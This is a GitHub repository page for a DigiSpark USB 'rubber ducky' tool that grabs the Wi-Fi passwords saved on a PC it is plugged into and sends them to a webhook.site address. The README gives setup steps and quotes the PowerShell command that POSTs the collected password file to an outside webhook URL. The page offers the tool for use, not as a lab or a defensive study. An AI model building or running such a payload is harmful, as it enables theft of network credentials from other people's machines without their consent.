Skip to content

usb rubber ducky that grabs saved wifi password from pc and sends into webhook site

Notifications You must be signed in to change notification settings

meezlung/wifi-grabber-ducky

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 

Repository files navigation

wifi-grabber-ducky

USB rubber ducky that grabs saved wifi password from pc and sends into a webhook site. This is highly inspired from Cyber Mentor's video.

Requirements

Usage

  1. Go to Webhook Site.

  2. Copy your unique URL.

    image

  3. Download wifi-key-grab.ino file and edit it using Arduino IDE.

  4. In line 42 or in the line of code below, change the webhook url to your unique URL.

DigiKeyboard.println("powershell Invoke-WebRequest -Uri https://webhook.site/2265df61-338c-470f-a0ec-0f6011dc9a16 -Method POST -InFile Wi-Fi-PASS"); //Submitting all passwords on hook
  1. Once set, compile your program in Arduino IDE.
  2. Plug in your DigiSpark USB, then upload the program.
  3. Enjoy.

Demo

wifi-key-grabber-demo

Note:

If ever you're going to use it again, make sure to repeat the steps again, as webhook URLs tend to reset after some time.

About

usb rubber ducky that grabs saved wifi password from pc and sends into webhook site

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Languages